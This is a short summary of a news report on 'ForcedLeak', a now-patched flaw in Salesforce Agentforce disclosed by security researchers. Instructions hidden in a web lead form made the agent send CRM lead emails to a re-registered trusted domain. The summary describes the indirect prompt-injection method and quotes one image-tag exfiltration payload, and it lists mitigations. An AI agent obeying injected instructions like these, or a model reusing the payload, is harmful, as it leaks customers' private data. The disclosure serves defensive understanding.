Prompt injection – and a $5 domain – trick Salesforce Agentforce leaking sales (www.theregister.com)

Security researchers at Noma disclosed a now-fixed vulnerability dubbed "ForcedLeak" in Salesforce’s Agentforce that could let attackers exfiltrate CRM records via prompt injection. The team used Salesforce’s Web-to-Lead form (the description field has a 42,000-character limit) to plant indirect malicious instructions that the agent later processed. Crucially, a Content Security Policy listed an expired trusted domain (my-salesforce-cms.com); researchers bought it for $5 and served an image tag that included URL-encoded lead emails as a query parameter (<img src="https://cdn.my-salesforce-cms.com/c.png?n={{answer3}}">). When the agent executed the injected prompt it queried CRM data and sent sensitive lead information to the attacker-controlled server. Salesforce patched the flaw, re-seized the domain, and began enforcing trusted-URL allow-lists for Agentforce and Einstein Generative AI; Noma rated the issue a 9.4 on CVSS v4.0. ForcedLeak highlights a growing, distinct attack surface for agentic AI: indirect prompt injection combined with misconfigured DNS/CSP and legacy trust boundaries can weaponize human-AI interactions. Technical takeaways include the danger of long free-text fields, implicit trust of allowed domains, and output channels (HTML/image requests) as covert exfiltration vectors. Mitigations shown here—strict trusted-URL policies, limiting agent access to sensitive records, output filtering and human oversight—are essential as AI agents proliferate in business workflows.